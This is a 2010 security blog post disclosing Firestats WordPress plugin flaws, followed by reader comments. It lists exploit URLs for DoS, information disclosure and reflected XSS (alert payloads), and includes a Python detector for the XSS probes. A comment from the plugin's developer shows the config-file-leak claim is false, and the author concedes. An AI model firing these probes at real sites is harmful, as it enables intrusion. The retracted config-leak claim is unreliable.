More 0day wordpress security leaks in firestats!
I just tried to find more security leaks in the firestats plugin, I was specifically searching for remotely exploitable problems.
The results are 7 fresh security issues.
1x DoS:
/wp-content/plugins/firestats/bridge.php?file_id=reset_password&show=1
1x remotely downloadable configuration file; this may contain the database information (username, password, name, prefix, host).
/wp-content/plugins/firestats/php/tools/get_config.php
2x Information disclosure:
/wp-content/plugins/firestats/php/page-sites.php
/wp-content/plugins/firestats/php/page-tools.php
3x XSS:
/wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E
/wp-content/plugins/firestats/php/window-add-excluded-url.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E
/wp-content/plugins/firestats/php/window-new-edit-site.php?site_id=%27%20onmousemove=alert%28123%29;%20style=width:900;height:900;%20a=
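For site operators running Firestats who want to know whether these reflected-XSS probes have hit their installation, the following added example (not code from the post or from the Firestats project) scans Apache/nginx combined-format access logs for requests to the three pages listed above whose query values carry a script tag or a quote-break followed by an inline event handler, which is exactly the shape of the payloads shown. The log lines are constructed for the example; the endpoint paths are the ones from the post.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# The three Firestats pages named in the post as reflecting their input.
FIRESTATS_XSS_ENDPOINTS = (
    "/wp-content/plugins/firestats/php/window-add-excluded-ip.php",
    "/wp-content/plugins/firestats/php/window-add-excluded-url.php",
    "/wp-content/plugins/firestats/php/window-new-edit-site.php",
)

# Signatures matching the two payload styles in the post: a <script> tag in a
# query value, and a quote character followed by an on*= event handler.
SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)
EVENT_HANDLER = re.compile(r"""['"]\s*on[a-z]+\s*=""", re.IGNORECASE)

# Combined log format: client, identd, user, [timestamp], "METHOD URL PROTO", status
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_values(url):
    """Return (param, decoded_value, reason) for each query value of a request
    to one of the listed Firestats pages that looks like a reflected-XSS probe.
    Requests to other paths are ignored so the check stays scoped to the
    plugin pages the post names."""
    parts = urlsplit(url)
    if parts.path not in FIRESTATS_XSS_ENDPOINTS:
        return []
    hits = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for raw in values:
            # parse_qs already percent-decodes once; decode again so a
            # double-encoded payload does not slip past the signatures.
            value = unquote(raw)
            if SCRIPT_TAG.search(value):
                hits.append((name, value, "script tag"))
            elif EVENT_HANDLER.search(value):
                hits.append((name, value, "event handler after quote break"))
    return hits


def scan_log(text):
    """Parse combined-format log text and return one dict per suspicious
    query value: client IP, timestamp, URL, parameter name and reason."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        for param, value, reason in suspicious_values(m.group("url")):
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "url": m.group("url"),
                "param": param,
                "value": value,
                "reason": reason,
            })
    return findings


# Constructed sample log: two probes against the listed pages, one benign
# request to a listed page, and one out-of-scope request carrying a tag.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Jul/2010:20:30:01 +0200] "GET /wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E HTTP/1.1" 200 512
203.0.113.7 - - [09/Jul/2010:20:30:05 +0200] "GET /wp-content/plugins/firestats/php/window-new-edit-site.php?site_id=%27%20onmousemove=alert%28123%29;%20style=width:900;height:900;%20a= HTTP/1.1" 200 770
198.51.100.4 - - [09/Jul/2010:20:31:10 +0200] "GET /wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=10.0.0.5 HTTP/1.1" 200 480
198.51.100.4 - - [09/Jul/2010:20:31:12 +0200] "GET /index.php?s=%3Cscript%3E HTTP/1.1" 200 9000
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['reason']}: {f['param']}={f['value']!r}")
```

The scan deliberately flags only the plugin pages from the post, so the fourth sample line (a search query containing a tag elsewhere on the site) is not reported; widen `FIRESTATS_XSS_ENDPOINTS` if you want the same signatures applied site-wide.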
Let’s hope they patch soon, because we are running Firestats too. The previous fix came very fast, so I assume they will fix it fast this time too.
Oh and feel free to test the exploits against this site (but don’t try out the DoS please).
Good luck Firestats team with fixing these vulnerabilities!
This entry was posted by Jelmer de Hen on 09/07/2010 at 20:28, and is filed under Critical, Web Security.
about 1 month ago
Nice find, hope they fix it soon.
about 1 month ago
The most significant thing is of course the configuration file download; however, it’s totally false.
See if you can get my config file from here:
http://admin.firestats.cc/firestats/php/tools/get_config.php
This PHP script is designed to generate a config file on demand, not to give the current one.
For instance, here is the config file of Bill Gates:
http://admin.firestats.cc/firestats/php/tools/get_config.php?user=Bill%20Gates&pass=secret!
about 1 month ago
You are right; I looked at the code but I could not find anything worthy.
Why would you have this function in Firestats? It’s pretty pointless, I think.
about 1 month ago
I am sure you can figure it out; if not, look at the comment in the new version of the file.
about 1 month ago
It was very interesting to read.
I want to quote your post in my blog. Can I?
And do you have an account on Twitter?
about 1 month ago
Yea, you may quote our blog. My personal Twitter is http://twitter.com/JelmerDeHen, and for the entire blog, where you automatically get updates as we update the site, it is http://twitter.com/HackAck. Feel free to follow us.
about 1 week ago
I love what you men are usually up to. This kind of clever work and reporting! Keep up the great functions guys, I’ve added you men to my blogroll. Cheers.